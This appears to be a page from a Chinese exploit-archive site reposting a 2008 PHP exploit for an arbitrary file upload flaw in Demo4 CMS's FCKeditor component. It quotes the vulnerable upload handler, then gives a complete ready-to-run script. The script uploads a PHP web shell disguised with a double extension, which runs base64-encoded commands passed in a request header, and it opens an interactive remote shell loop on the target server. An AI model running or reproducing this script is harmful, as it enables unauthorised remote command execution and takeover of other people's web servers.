首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Demo4 CMS 1b (fckeditor) Arbitrary File Upload Exploit
来源:www.vfcocus.net 作者:Stack 发布时间:2008-06-24  
<?php
/*
--------------------------------------------------------------
      Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload
--------------------------------------------------------------
   by Stack
  Special thnx for : Egix
[-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php

41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55.     SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63.  SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl  = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73.  $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75.  //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76.  $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80.  // Compose the file path.
81.  $sFilePath = $sServerDir . $sFileName ;
82.
83.  // If a file with that name already exists.
84.  if ( is_file( $sFilePath ) )
85.  {
86.   $iCounter++ ;
87.   $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88.   $sErrorNumber = '201' ;
89.  }
90.  else
91.  {
92.   move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94.   if ( is_file( $sFilePath ) )
95.   {
96.    $oldumask = umask(0) ;
97.    chmod( $sFilePath, 0777 ) ;
98.    umask( $oldumask ) ;
99.   }
100.
101.   $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103.   break ;

*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
  print "\n[-] No response from {$host}:80 Trying again...";
  $sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n|Demo4 CMS Beta01 (fckeditor) Arbitrary File Upload Exploit by Stack |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data  = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet  = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
  $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
  $packet.= "Host: {$host}\r\n";
  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
  $packet.= "Connection: close\r\n\r\n";
  $output = http_send($host, $packet);
  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
  $shell = explode("_code_", $output);
  print "\n{$shell[1]}";
}
else break;
}
?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·cmsWorks 2.2 RC4 (fckeditor) R
·TOKOKITA (barang.php produk_id
·Mambo Component Articles (arti
·uTorrent / BitTorrent WebIU H
·IGSuite 3.2.4 (reverse shell)
·PHPmotion <= 2.0 (update_profi
·vc6.0栈溢出
·PHPmotion <= 2.0 (update_profi
·CaupoShop Classic 1.3 (saArtic
·Seagull PHP Framework <= 0.6.4
·Visual Basic Enterprise Editio
·XnView 1.93.6 for Windows .taa
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved